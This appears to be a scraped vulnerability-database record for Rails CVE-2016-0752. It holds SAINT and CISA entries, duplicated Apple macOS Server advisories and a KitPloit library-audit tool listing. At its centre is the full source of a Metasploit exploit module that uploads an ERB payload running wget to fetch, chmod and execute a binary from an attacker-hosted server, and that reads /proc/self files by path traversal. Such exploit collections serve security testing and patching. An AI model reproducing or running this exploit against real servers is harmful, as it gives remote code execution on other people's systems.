11/11/2016 \nCVE: 
[CVE-2016-0752](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0752>) \nBID: [81801](<http://www.securityfocus.com/bid/81801>) \n\n\n### Background\n\n[Ruby on Rails](<http://rubyonrails.org/>) is a web application framework written in Ruby. \n\n### Problem\n\nA vulnerability in Ruby on Rails allows arbitrary code to be uploaded and executed on the server if the application endpoint users dynamic render paths. \n\n### Resolution\n\nUpgrade to Ruby on Rails 3.2.22.1, 4.1.14.1, 4.2.5.1, or higher. \n\n### References\n\n<https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/> \n\n\n### Limitations\n\nExploit works on Linux. The `**wget**` program must exist on the target. The URL path to an endpoint which uses dynamic render paths must be specified. \n\n### Platforms\n\nLinux \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2016-11-11T00:00:00", "type": "saint", "title": "Ruby on Rails Dynamic Render code execution", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-11-11T00:00:00", "id": "SAINT:627CB79E1D20B9CA5F6ED2D62D3FF6BB", "href": 
"http://download.saintcorporation.com/cgi-bin/exploit_info/ruby_on_rails_dynamic_render", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Directory traversal vulnerability in Action View in Ruby on Rails allows remote attackers to read arbitrary files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-25T00:00:00", "type": "cisa_kev", "title": "Ruby on Rails Directory Traversal Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2022-03-25T00:00:00", "id": "CISA-KEV-CVE-2016-0752", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2022-11-02T13:41:14", "description": "This module exploits a remote code execution vulnerability in the explicit render method when leveraging user parameters. This module has been tested across multiple versions of Ruby on Rails. 
The technique used by this module requires the specified endpoint to be using dynamic render paths, such as the following example: def show render params[:id] end Also, the vulnerable target will need a POST endpoint for the TempFile upload, this can literally be any endpoint. This module doesnt use the log inclusion method of exploitation due to it not being universal enough. Instead, a new code injection technique was found and used whereby an attacker can upload temporary image files against any POST endpoint and use them for the inclusion attack. Finally, you only get one shot at this if you are testing with the builtin rails server, use caution.\n", "cvss3": {}, "published": "2016-10-10T22:36:20", "type": "metasploit", "title": "Ruby on Rails Dynamic Render File Upload Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-0752"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT-MULTI-HTTP-RAILS_DYNAMIC_RENDER_CODE_EXEC-", "href": "https://www.rapid7.com/db/modules/exploit/multi/http/rails_dynamic_render_code_exec/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::HttpServer\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',\n 'Description' => %q{\n This module exploits a remote code execution vulnerability in the explicit render\n method when leveraging user parameters.\n This module has been tested across multiple versions of Ruby on Rails.\n The technique used by this module requires the specified\n endpoint to be using dynamic render paths, such as the following example:\n\n def show\n render params[:id]\n end\n\n Also, 
the vulnerable target will need a POST endpoint for the TempFile upload, this\n can literally be any endpoint. This module doesnt use the log inclusion method of\n exploitation due to it not being universal enough. Instead, a new code injection\n technique was found and used whereby an attacker can upload temporary image files\n against any POST endpoint and use them for the inclusion attack. Finally, you only\n get one shot at this if you are testing with the builtin rails server, use caution.\n },\n 'Author' =>\n [\n 'mr_me <mr_me@offensive-security.com>', # necromanced old bug & discovered new vector rce vector\n 'John Poulin (forced-request)' # original render bug finder\n ],\n 'References' =>\n [\n [ 'CVE', '2016-0752'],\n [ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch\n [ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016\n [ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => ['linux', 'bsd'],\n 'Arch' => ARCH_X86,\n 'Payload' =>\n {\n 'DisableNops' => true,\n },\n 'Privileged' => false,\n 'Targets' =>\n [\n [ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2016-10-16'))\n register_options(\n [\n Opt::RPORT(3000),\n OptString.new('URIPATH', [ true, 'The path to the vulnerable route', \"/users\"]),\n OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),\n ])\n end\n\n def check\n\n # this is the check for the dev environment\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URIPATH'], \"%2f\"),\n 'method' => 'GET',\n }, 60)\n\n # if the page controller is dynamically rendering, its for sure vuln\n if res and res.body =~ /render params/\n return CheckCode::Vulnerable\n end\n\n # this is the check 
for the prod environment\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URIPATH'], \"%2fproc%2fself%2fcomm\"),\n 'method' => 'GET',\n }, 60)\n\n # if we can read files, its likley we can execute code\n if res and res.body =~ /ruby/\n return CheckCode::Appears\n end\n return CheckCode::Safe\n end\n\n def on_request_uri(cli, request)\n if (not @pl)\n print_error(\"#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!\")\n return\n end\n print_status(\"#{rhost}:#{rport} - Sending the payload to the server...\")\n @elf_sent = true\n send_response(cli, @pl)\n end\n\n def send_payload\n @bd = rand_text_alpha(8+rand(8))\n fn = rand_text_alpha(8+rand(8))\n un = rand_text_alpha(8+rand(8))\n pn = rand_text_alpha(8+rand(8))\n register_file_for_cleanup(\"/tmp/#{@bd}\")\n cmd = \"wget #{@service_url} -O /tmp/#{@bd};\"\n cmd << \"chmod 755 /tmp/#{@bd};\"\n cmd << \"/tmp/#{@bd}\"\n pay = \"<%=`#{cmd}`%>\"\n print_status(\"uploading image...\")\n data = Rex::MIME::Message.new\n data.add_part(pay, nil, nil, 'form-data; name=\"#{un}\"; filename=\"#{fn}.gif\"')\n res = send_request_cgi({\n 'method' => 'POST',\n 'cookie' => @cookie,\n 'uri' => normalize_uri(datastore['URIPATH'], pn),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s\n })\n if res and res.code == 422 and res.body =~ /Tempfile:\\/(.*)>/\n @path = \"#{$1}\" if res.body =~ /Tempfile:\\/(.*)>/\n return true\n else\n\n # this is where we pull the log file\n if leak_log\n return true\n end\n end\n return false\n end\n\n def leak_log\n\n # path to the log /proc/self/fd/7\n # this bypasses the extension check\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URIPATH'], \"proc%2fself%2ffd%2f7\"),\n 'method' => 'GET',\n }, 60)\n\n if res and res.code == 200 and res.body =~ /Tempfile:\\/(.*)>, @original_filename=/\n @path = \"#{$1}\" if res.body =~ /Tempfile:\\/(.*)>, @original_filename=/\n return true\n end\n return false\n end\n\n def 
start_http_server\n @pl = generate_payload_exe\n @elf_sent = false\n downfile = rand_text_alpha(8+rand(8))\n resource_uri = '/' + downfile\n if (datastore['SRVHOST'] == \"0.0.0.0\" or datastore['SRVHOST'] == \"::\")\n srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)\n else\n srv_host = datastore['SRVHOST']\n end\n\n # do not use SSL for the attacking web server\n if datastore['SSL']\n ssl_restore = true\n datastore['SSL'] = false\n end\n\n @service_url = \"http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}\"\n service_url_payload = srv_host + resource_uri\n print_status(\"#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...\")\n start_service({'Uri' => {\n 'Proc' => Proc.new { |cli, req|\n on_request_uri(cli, req)\n },\n 'Path' => resource_uri\n }})\n datastore['SSL'] = true if ssl_restore\n connect\n end\n\n def render_tmpfile\n @path.gsub!(/\\//, '%2f')\n res = send_request_cgi({\n 'uri' => normalize_uri(datastore['URIPATH'], @path),\n 'method' => 'GET',\n }, 1)\n end\n\n def exploit\n print_status(\"Sending initial request to detect exploitability\")\n start_http_server\n if send_payload\n print_good(\"injected payload\")\n render_tmpfile\n\n # we need to delay, for the stager\n select(nil, nil, nil, 5)\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/rails_dynamic_render_code_exec.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "apple": [{"lastseen": "2020-12-24T20:42:16", "description": "## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. 
You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS Server 5.3\n\nReleased March 27, 2017\n\n**Profile Manager**\n\nAvailable for: macOS 10.12.4 and later\n\nImpact: A remote user may be able to cause a denial-of-service\n\nDescription: A crafted request may cause a global cache to grow indefinitely, leading to a denial-of-service. This was addressed by not caching unknown MIME types.\n\nCVE-2016-0751\n\n**Web Server**\n\nAvailable for: macOS 10.12.4 and later\n\nImpact: A remote attacker may be able to cause a denial of service against the HTTP server via partial HTTP requests\n\nDescription: This issue was addressed by adding mod_reqtimeout.\n\nCVE-2007-6750\n\n**Wiki Server**\n\nAvailable for: macOS 10.12.4 and later\n\nImpact: A remote attacker may be able to enumerate users\n\nDescription: An access issue was addressed through improved permissions checking.\n\nCVE-2017-2382: Maris Kocins of SEMTEXX LTD\n", "edition": 3, "cvss3": {}, "published": "2017-03-28T04:58:08", "title": "About the security content of macOS Server 5.3 - Apple Support", "type": "apple", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2382", "CVE-2016-0751", "CVE-2007-6750"], "modified": "2017-03-28T04:58:08", "id": "APPLE:HT207604", "href": "https://support.apple.com/kb/HT207604", "cvss": {"score": 5.0, "vector": 
"AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-11-10T17:00:49", "description": "# About the security content of macOS Server 5.3\n\nThis document describes the security content of macOS Server 5.3.\n\n## About Apple security updates\n\nFor our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available. Recent releases are listed on the [Apple security updates](<https://support.apple.com/kb/HT201222>) page.\n\nFor more information about security, see the [Apple Product Security](<https://support.apple.com/kb/HT201220>) page. You can encrypt communications with Apple using the [Apple Product Security PGP Key](<https://support.apple.com/kb/HT201601>).\n\nApple security documents reference vulnerabilities by [CVE-ID](<http://cve.mitre.org/about/>) when possible.\n\n\n\n## macOS Server 5.3\n\nReleased March 27, 2017\n\n**Profile Manager**\n\nAvailable for: macOS 10.12.4 and later\n\nImpact: A remote user may be able to cause a denial-of-service\n\nDescription: A crafted request may cause a global cache to grow indefinitely, leading to a denial-of-service. This was addressed by not caching unknown MIME types.\n\nCVE-2016-0751\n\n**Web Server**\n\nAvailable for: macOS 10.12.4 and later\n\nImpact: A remote attacker may be able to cause a denial of service against the HTTP server via partial HTTP requests\n\nDescription: This issue was addressed by adding mod_reqtimeout.\n\nCVE-2007-6750\n\n**Wiki Server**\n\nAvailable for: macOS 10.12.4 and later\n\nImpact: A remote attacker may be able to enumerate users\n\nDescription: An access issue was addressed through improved permissions checking.\n\nCVE-2017-2382: Maris Kocins of SEMTEXX LTD\n\nInformation about products not manufactured by Apple, or independent websites not controlled or tested by Apple, is provided without recommendation or endorsement. 
Apple assumes no responsibility with regard to the selection, performance, or use of third-party websites or products. Apple makes no representations regarding third-party website accuracy or reliability. [Contact the vendor](<http://support.apple.com/kb/HT2693>) for additional information.\n\nPublished Date: March 28, 2017\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-03-27T00:00:00", "type": "apple", "title": "About the security content of macOS Server 5.3", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2007-6750", "CVE-2016-0751", "CVE-2017-2382"], "modified": "2017-03-27T00:00:00", "id": "APPLE:B9A45A59599AAB4A4CDF843F56D06965", "href": "https://support.apple.com/kb/HT207604", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "kitploit": [{"lastseen": "2022-04-07T12:01:14", "description": "A simple tool to audit Unix/*BSD/Linux system libraries 
to find public security vulnerabilities.\n\n \n\n\nTo install requirements:\n \n \n $ sudo python3 -m pip install -r requirements.txt \n \n\nOverview:\n\n \n \n $ python3 master_librarian.py -h \n Master librarian v0.3 \n Tool to search public vulnerabilities on local libraries \n by CoolerVoid \n \n Example: \n \t$ python3 master_librarian.py -t csv \n \t$ python3 master_librarian.py -t txt -l 3 \n \n usage: master_librarian.py [-h] -t TYPES [-l LIMIT] \n \n optional arguments: \n -h, --help show this help message and exit \n -t TYPES, --type TYPES \n Name of output type for logs(txt or csv) \n -l LIMIT, --limit LIMIT \n Limit CVEs per pages in nvd NIST search(default is 3) \n \n \n\nExample:\n \n \n $ python3 master_librarian.py -t txt \n \n\noutput\n\nvulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server. https://nvd.nist.gov/vuln/detail/CVE-2020-13529 2.9 LOW systemd through v245 mishandles numerical usernames such as ones composed of decimal digits or 0x followed by hex digits, as demonstrated by use of root privileges when privileges of the 0x0 user account were intended. NOTE: this issue exists because of an incomplete fix for CVE-2017-1000082. https://nvd.nist.gov/vuln/detail/CVE-2020-13776 6.2 MEDIUM A heap use-after-free vulnerability was found in systemd before version v245-rc1, where asynchronous Polkit queries are performed while handling dbus messages. 
A local unprivileged attacker can abuse this flaw to crash systemd services or potentially execute code and elevate their privileges, by sending specially crafted dbus messages. https://nvd.nist.gov/vuln/detail/CVE-2020-1712 4.6 MEDIUM expat 2.2.9 pangocairo 1.44.7 xdmcp 1.1.3 libpcreposix 8.39 ruby-2.7 2.7.0 glib-2.0 2.64.6 gnome-system-tools 3.0.0 xinerama 1.1.4 nunit 2.6.3 gmp 6.2.0 libevent 2.1.11-stable xbuild12 12.0 xorg-sgml-doctools 1.11 presentproto 1.2 gdk-pixbuf-2.0 2.40.0 inputproto 2.3.2 libssl 1.1.1f xcb-shm 1.14 gdk-2.0 2.24.32 libpng16 1.6.37 bigreqsproto 1.1.2 icu-io 66.1 xextproto 7.3.0 libthai 0.1.28 libbsd-overlay 0.10.0 mount 2.34.0 gio-2.0 2.64.6 adwaita-icon-theme 3.36.1 fontconfig 2.13.1 xrandr 1.5.2 monosgen-2 6.8.0.105 mono 6.8.0.105 xf86dgaproto 2.1 dri3proto 1.2 libpcre 8.39 pangoxft 1.44.7 blkid 2.34.0 libsepol 3.0 libevent_openssl 2.1.11-stable uuid 2.34.0 gmodule-2.0 2.64.6 graphite2 3.0.1 libfl 2.6.4 zlib 1.2.11 cairo-pdf 1.16.0 ruby 2.7.0 Addressable is an alternative implementation to the URI implementation that is part of Ruby's standard library. An uncontrolled resource consumption vulnerability exists after version 2.3.0 through version 2.7.0. Within the URI template implementation in Addressable, a maliciously crafted template may result in uncontrolled resource consumption, leading to [denial of service](<https://www.kitploit.com/search/label/Denial%20of%20Service> \"denial of service\" ) when matched against a URI. In typical usage, templates would not normally be read from untrusted user input, but nonetheless, no previous security advisory for Addressable has cautioned against doing this. Users of the parsing capabilities in Addressable but not the URI template capabilities are unaffected. The vulnerability is patched in version 2.8.0. As a workaround, only create Template objects from trusted sources that have been validated not to produce catastrophic backtracking. 
https://nvd.nist.gov/vuln/detail/CVE-2021-32740 5.0 MEDIUM An issue was discovered in Ruby 2.5.x through 2.5.7, 2.6.x through 2.6.5, and 2.7.0. If a victim calls BasicSocket#read_nonblock(requested_size, buffer, exception: false), the method resizes the buffer to fit the requested size, but no data is copied. Thus, the buffer string provides the previous value of the heap. This may expose possibly sensitive data from the interpreter. https://nvd.nist.gov/vuln/detail/CVE-2020-10933 5.0 MEDIUM libevent_extra 2.1.11-stable system.web.mvc3 3.0.0.0 libstartup-notification-1.0 0.12 mono-2 6.8.0.105 mono-nunit 2.6.3 gobject-2.0 2.64.6 glproto 1.4.17 cairo-ft 1.16.0 cairo 1.16.0, in cairo_ft_apply_variations() in cairo-ft-font.c, would free memory using a free function incompatible with WebKit's fastMalloc, leading to an application crash with a \"free(): invalid pointer\" error. https://nvd.nist.gov/vuln/detail/CVE-2018-19876 4.3 MEDIUM xcb 1.14 Directory traversal vulnerability in Action View in [Ruby on Rails](<https://www.kitploit.com/search/label/Ruby%20on%20Rails> \"Ruby on Rails\" ) before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname. 
https://nvd.nist.gov/vuln/detail/CVE-2016-0752 5.0 MEDIUM fribidi 1.0.8 xtrans 1.4.0 cairo-xlib-xrender 1.16.0 mono-lineeditor 0.2.1 xcmiscproto 1.2.2 gmodule-no-export-2.0 2.64.6 dri2proto 2.8 python3-embed 3.8 libpcre32 8.39 system.web.mvc2 2.0.0.0 dotnet 6.8.0.105 iso-codes 4.4 fontutil 1.3.1 xbitmaps 1.1.1 system.web.extensions_1.0 1.0.61025.0 recordproto 1.14.2 resourceproto 1.2.0 mobile-broadband-provider-info 20190618 videoproto 2.3.3 libevent_core 2.1.11-stable fontsproto 2.1.3 xsp-4 4.2 python3 3.8 In Python 3.8.4, sys.path restrictions specified in a python38._pth file are ignored, allowing code to be loaded from arbitrary locations. The <executable-name>._pth file (e.g., the python._pth file) is not affected. https://nvd.nist.gov/vuln/detail/CVE-2020-15801 7.5 HIGH In Python 3.6 through 3.6.10, 3.7 through 3.7.8, 3.8 through 3.8.4rc1, and 3.9 through 3.9.0b4 on Windows, a Trojan horse python3.dll might be used in cases where CPython is embedded in a native application. This occurs because python3X.dll may use an invalid search path for python3.dll loading (after Py_SetPath has been used). NOTE: this issue CANNOT occur when using python.exe from a standard (non-embedded) Python installation on Windows. https://nvd.nist.gov/vuln/detail/CVE-2020-15523 6.9 MEDIUM xineramaproto 1.2.1 xcb-render 1.14 libpcre2-32 10.34 libbsd-ctor 0.10.0 libbsd 0.10.0 nlist.c in libbsd before 0.10.0 has an out-of-bounds read during a comparison for a symbol name from the string table (strtab). 
https://nvd.nist.gov/vuln/detail/CVE-2019-20367 6.4 MEDIUM xft 2.3.3 \">\n \n \n Master librarian v0.3 \n Tool to search public vulnerabilities on local libraries \n by CoolerVoid \n \n Example: \n \t$ python3 master_librarian.py -t csv \n \t$ python3 master_librarian.py -t txt -l 3 \n \n Master librarian v0.3 \n Tool to search public vulnerabilities on local libraries \n by CoolerVoid \n \n Search pitfalls in operational system local packages \n \n xres 1.2.0 \n cairo-ps 1.16.0 \n xf86vidmodeproto 2.3.1 \n libcrypto 1.1.1f \n damageproto 1.2.1 \n libffi 3.3 \n xfixes 5.0.3 \n \t\tInteger overflow in X.org libXfixes before 5.0.3 on 32-bit platforms might allow remote X servers to gain privileges via a length value of INT_MAX, which triggers the client to stop reading data and get out of sync. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2016-7944 \n \t\t7.5 HIGH \n \n system.web.extensions.design_1.0 1.0.61025.0 \n kbproto 1.0.7 \n gio-unix-2.0 2.64.6 \n gdk-x11-2.0 2.24.32 \n sqlite3 3.31.1 \n cairo-png 1.16.0 \n lib pcre2-posix 10.34 \n wcf 6.8.0.105 \n dmxproto 2.3.1 \n cairo-script 1.16.0 \n xext 1.3.4 \n x11 1.6.9 \n system.web.mvc 1.0.0.0 \n mono-cairo 6.8.0.105 \n cecil 6.8.0.105 \n udev 245 \n \t\tThe default configuration of udev on Linux does not warn the user before enabling additional Human Interface Device (HID) functionality over USB, which allows user-assisted attackers to execute arbitrary programs via crafted USB data, as demonstrated by keyboard and mouse data sent by malware on a smartphone that the user connected to the computer. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2011-0640 \n \t\t6.9 MEDIUM \n \n \t\tplymouth-pretrigger.sh in dracut and udev, when running on Fedora 13 and 14, sets weak permissions for the /dev/systty device file, which allows remote authenticated users to read terminal data from tty0 for local users. 
\n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2010-4176 \n \t\t4.0 MEDIUM \n \n xkeyboard-config 2.29 \n bash-completion 2.10 \n yelp-xsl 3.36.0 \n xdamage 1.1.5 \n libgdiplus 6.0.4 \n icu-uc 66.1 \n xcomposite 0.4.5 \n harfbuzz 2.6.4 \n pixman-1 0.38.4 \n pthread-stubs 0.4 \n systemd 245 \n \t\tAn exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2020-13529 \n \t\t2.9 LOW \n \n \t\tsystemd through v245 mishandles numerical usernames such as ones composed of decimal digits or 0x followed by hex digits, as demonstrated by use of root privileges when privileges of the 0x0 user account were intended. NOTE: this issue exists because of an incomplete fix for CVE-2017-1000082. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2020-13776 \n \t\t6.2 MEDIUM \n \n \t\tA heap use-after-free vulnerability was found in systemd before version v245-rc1, where asynchronous Polkit queries are performed while handling dbus messages. A local unprivileged attacker can abuse this flaw to crash systemd services or potentially execute code and elevate their privileges, by sending specially crafted dbus messages. 
\n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2020-1712 \n \t\t4.6 MEDIUM \n \n expat 2.2.9 \n pangocairo 1.44.7 \n xdmcp 1.1.3 \n libpcreposix 8.39 \n ruby-2.7 2.7.0 \n glib-2.0 2.64.6 \n gnome-system-tools 3.0.0 \n xinerama 1.1.4 \n nunit 2.6.3 \n gmp 6.2.0 \n libevent 2.1.11-stable \n xbuild12 12.0 \n xorg-sgml-doctools 1.11 \n presentproto 1.2 \n gdk-pixbuf-2.0 2.40.0 \n inputproto 2.3.2 \n libssl 1.1.1f \n xcb-shm 1.14 \n gdk-2.0 2.24.32 \n libpng16 1.6.37 \n bigreqsproto 1.1.2 \n icu-io 66.1 \n xextproto 7.3.0 \n libthai 0.1.28 \n libbsd-overlay 0.10.0 \n mount 2.34.0 \n gio-2.0 2.64.6 \n adwaita-icon-theme 3.36.1 \n fontconfig 2.13.1 \n xrandr 1.5.2 \n monosgen-2 6.8.0.105 \n mono 6.8.0.105 \n xf86dgaproto 2.1 \n dri3proto 1.2 \n libpcre 8.39 \n pangoxft 1.44.7 \n blkid 2.34.0 \n libsepol 3.0 \n libevent_openssl 2.1.11-stable \n uuid 2.34.0 \n gmodule-2.0 2.64.6 \n graphite2 3.0.1 \n libfl 2.6.4 \n zlib 1.2.11 \n cairo-pdf 1.16.0 \n ruby 2.7.0 \n \t\tAddressable is an alternative implementation to the URI implementation that is part of Ruby's standard library. An uncontrolled resource consumption vulnerability exists after version 2.3.0 through version 2.7.0. Within the URI template implementation in Addressable, a maliciously crafted template may result in uncontrolled resource consumption, leading to denial of service when matched against a URI. In typical usage, templates would not normally be read from untrusted user input, but nonetheless, no previous security advisory for Addressable has cautioned against doing this. Users of the parsing capabilities in Addressable but not the URI template capabilities are unaffected. The vulnerability is patched in version 2.8.0. As a workaround, only create Template objects from trusted sources that have been validated not to produce catastrophic backtracking. 
\n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2021-32740 \n \t\t5.0 MEDIUM \n \n \t\tAn issue was discovered in Ruby 2.5.x through 2.5.7, 2.6.x through 2.6.5, and 2.7.0. If a victim calls BasicSocket#read_nonblock(requested_size, buffer, exception: false), the method resizes the buffer to fit the requested size, but no data is copied. Thus, the buffer string provides the previous value of the heap. This may expose possibly sensitive data from the interpreter. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2020-10933 \n \t\t5.0 MEDIUM \n \n libevent_extra 2.1.11-stable \n system.web.mvc3 3.0.0.0 \n libstartup-notification-1.0 0.12 \n mono-2 6.8.0.105 \n mono-nunit 2.6.3 \n gobject-2.0 2.64.6 \n glproto 1.4.17 \n cairo-ft 1.16.0 \n \t\tcairo 1.16.0, in cairo_ft_apply_variations() in cairo-ft-font.c, would free memory using a free function incompatible with WebKit's fastMalloc, leading to an application crash with a \"free(): invalid pointer\" error. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2018-19876 \n \t\t4.3 MEDIUM \n \n xcb 1.14 \n \t\tDirectory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x before 5.0.0.beta1.1 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2016-0752 \n \t\t5.0 MEDIUM \n \n fribidi 1.0.8 \n xtrans 1.4.0 \n cairo-xlib-xrender 1.16.0 \n mono-lineeditor 0.2.1 \n xcmiscproto 1.2.2 \n gmodule-no-export-2.0 2.64.6 \n dri2proto 2.8 \n python3-embed 3.8 \n libpcre32 8.39 \n system.web.mvc2 2.0.0.0 \n dotnet 6.8.0.105 \n iso-codes 4.4 \n fontutil 1.3.1 \n xbitmaps 1.1.1 \n system.web.extensions_1.0 1.0.61025.0 \n recordproto 1.14.2 \n resourceproto 1.2.0 \n mobile-broadband-provider-info 20190618 \n videoproto 2.3.3 \n libevent_core 2.1.11-stable \n fontsproto 2.1.3 \n xsp-4 4.2 \n python3 3.8 \n \t\tIn Python 3.8.4, sys.path restrictions specified in a python38._pth file are ignored, allowing code to be loaded from arbitrary locations. The <executable-name>._pth file (e.g., the python._pth file) is not affected. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2020-15801 